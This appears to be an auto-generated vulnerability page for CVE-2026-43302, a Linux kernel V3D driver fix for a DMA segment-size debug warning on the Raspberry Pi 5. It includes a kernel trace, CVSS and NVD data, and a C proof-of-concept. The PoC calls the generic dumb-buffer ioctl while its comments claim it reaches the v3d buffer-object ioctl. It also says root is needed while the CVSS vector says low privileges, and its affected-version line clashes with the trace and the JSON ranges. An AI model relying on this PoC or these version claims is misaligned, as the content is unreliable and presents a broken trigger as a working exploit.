Security Vulnerability Report
CVE-2026-43302 CVSS 5.5 MEDIUM

CVE-2026-43302

Published: 2026-05-08 14:16:37
Last Modified: 2026-05-15 13:34:21
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

drm/v3d: Set DMA segment size to avoid debug warnings

When using V3D rendering with CONFIG_DMA_API_DEBUG enabled, the kernel occasionally reports a segment size mismatch. This is because 'max_seg_size' is not set. The kernel defaults to 64K. Setting 'max_seg_size' to the maximum will prevent 'debug_dma_map_sg()' from complaining about the over-mapping of the V3D segment length.

DMA-API: v3d 1002000000.v3d: mapping sg segment longer than device claims to support [len=8290304] [max=65536]
WARNING: CPU: 0 PID: 493 at kernel/dma/debug.c:1179 debug_dma_map_sg+0x330/0x388
CPU: 0 UID: 0 PID: 493 Comm: Xorg Not tainted 6.12.53-yocto-standard #1
Hardware name: Raspberry Pi 5 Model B Rev 1.0 (DT)
pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : debug_dma_map_sg+0x330/0x388
lr : debug_dma_map_sg+0x330/0x388
sp : ffff8000829a3ac0
x29: ffff8000829a3ac0 x28: 0000000000000001 x27: ffff8000813fe000
x26: ffffc1ffc0000000 x25: ffff00010fdeb760 x24: 0000000000000000
x23: ffff8000816a9bf0 x22: 0000000000000001 x21: 0000000000000002
x20: 0000000000000002 x19: ffff00010185e810 x18: ffffffffffffffff
x17: 69766564206e6168 x16: 74207265676e6f6c x15: 20746e656d676573
x14: 20677320676e6970 x13: 5d34303334393134 x12: 0000000000000000
x11: 00000000000000c0 x10: 00000000000009c0 x9 : ffff8000800e0b7c
x8 : ffff00010a315ca0 x7 : ffff8000816a5110 x6 : 0000000000000001
x5 : 000000000000002b x4 : 0000000000000002 x3 : 0000000000000008
x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff00010a315280
Call trace:
 debug_dma_map_sg+0x330/0x388
 __dma_map_sg_attrs+0xc0/0x278
 dma_map_sgtable+0x30/0x58
 drm_gem_shmem_get_pages_sgt+0xb4/0x140
 v3d_bo_create_finish+0x28/0x130 [v3d]
 v3d_create_bo_ioctl+0x54/0x180 [v3d]
 drm_ioctl_kernel+0xc8/0x140
 drm_ioctl+0x2d4/0x4d8

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.12.53
Linux Kernel stable branches prior to commit 0290934d30abe7c88e18140fd5184c3f386b1e44

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-43302: Trigger V3D DMA debug warning/crash
 * This code attempts to create a buffer object (BO) larger than 64KB
 * using the V3D driver to trigger the debug_dma_map_sg warning.
 * Requires: Root access, V3D hardware (e.g., Raspberry Pi),
 * and kernel built with CONFIG_DMA_API_DEBUG enabled.
 */
#include <fcntl.h>
#include <stdint.h>   /* uint32_t, uint64_t */
#include <stdio.h>    /* perror, printf */
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

// Simplified DRM structures for demonstration
struct drm_mode_create_dumb {
    uint32_t width;
    uint32_t height;
    uint32_t bpp;
    uint32_t flags;
    uint32_t handle;
    uint32_t pitch;
    uint64_t size;
};

// Full request code: DRM_IOWR(0xB2, struct drm_mode_create_dumb),
// i.e. read/write direction, 32-byte argument, type 'd', number 0xB2.
#define DRM_IOCTL_MODE_CREATE_DUMB 0xC02064B2UL

int main(void)
{
    int fd = open("/dev/dri/card0", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    struct drm_mode_create_dumb create_req = {0};

    // Request a buffer larger than 64KB (e.g., 4096x4096x4 bytes = 64MB)
    create_req.width = 4096;
    create_req.height = 4096;
    create_req.bpp = 32;

    // Trigger the v3d_create_bo_ioctl path
    // This leads to v3d_bo_create_finish -> dma_map_sgtable
    if (ioctl(fd, DRM_IOCTL_MODE_CREATE_DUMB, &create_req) < 0) {
        perror("IOCTL failed");
        close(fd);
        return 1;
    }

    // Check dmesg for:
    // "DMA-API: v3d ... mapping sg segment longer than device claims to support"
    printf("Buffer created. Check dmesg for DMA warnings.\n");

    close(fd);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43302", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:37.447", "lastModified": "2026-05-15T13:34:21.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/v3d: Set DMA segment size to avoid debug warnings\n\nWhen using V3D rendering with CONFIG_DMA_API_DEBUG enabled, the\nkernel occasionally reports a segment size mismatch. This is because\n'max_seg_size' is not set. The kernel defaults to 64K. setting\n'max_seg_size' to the maximum will prevent 'debug_dma_map_sg()'\nfrom complaining about the over-mapping of the V3D segment length.\n\nDMA-API: v3d 1002000000.v3d: mapping sg segment longer than device\n claims to support [len=8290304] [max=65536]\nWARNING: CPU: 0 PID: 493 at kernel/dma/debug.c:1179 debug_dma_map_sg+0x330/0x388\nCPU: 0 UID: 0 PID: 493 Comm: Xorg Not tainted 6.12.53-yocto-standard #1\nHardware name: Raspberry Pi 5 Model B Rev 1.0 (DT)\npstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : debug_dma_map_sg+0x330/0x388\nlr : debug_dma_map_sg+0x330/0x388\nsp : ffff8000829a3ac0\nx29: ffff8000829a3ac0 x28: 0000000000000001 x27: ffff8000813fe000\nx26: ffffc1ffc0000000 x25: ffff00010fdeb760 x24: 0000000000000000\nx23: ffff8000816a9bf0 x22: 0000000000000001 x21: 0000000000000002\nx20: 0000000000000002 x19: ffff00010185e810 x18: ffffffffffffffff\nx17: 69766564206e6168 x16: 74207265676e6f6c x15: 20746e656d676573\nx14: 20677320676e6970 x13: 5d34303334393134 x12: 0000000000000000\nx11: 00000000000000c0 x10: 00000000000009c0 x9 : ffff8000800e0b7c\nx8 : ffff00010a315ca0 x7 : ffff8000816a5110 x6 : 0000000000000001\nx5 : 000000000000002b x4 : 0000000000000002 x3 : 0000000000000008\nx2 : 0000000000000000 x1 : 0000000000000000 x0 : ffff00010a315280\nCall trace:\n debug_dma_map_sg+0x330/0x388\n __dma_map_sg_attrs+0xc0/0x278\n dma_map_sgtable+0x30/0x58\n 
drm_gem_shmem_get_pages_sgt+0xb4/0x140\n v3d_bo_create_finish+0x28/0x130 [v3d]\n v3d_create_bo_ioctl+0x54/0x180 [v3d]\n drm_ioctl_kernel+0xc8/0x140\n drm_ioctl+0x2d4/0x4d8"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-131"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.18", "versionEndExcluding": "5.15.202", "matchCriteriaId": "ECCCB6D8-FB4F-4A5D-BDE0-C63C378DE186"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.165", "matchCriteriaId": "797C7F46-D0BE-4FB8-A502-C5EF8E6B6654"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0290934d30abe7c88e18140fd5184c3f386b1e44", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/14d0d6c8b4504a60cfeea74775ab2e0164019e65", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/225023e3619b81af6d8d0e680503fc2d68633023", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2663ef70c6123b2232190f917275e5c3175f97d0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9eb018828b1b30dfba689c060735c50fc5b9f704", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cf510785f74e74c54de40a43a955b7f844857487", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67 ... (truncated)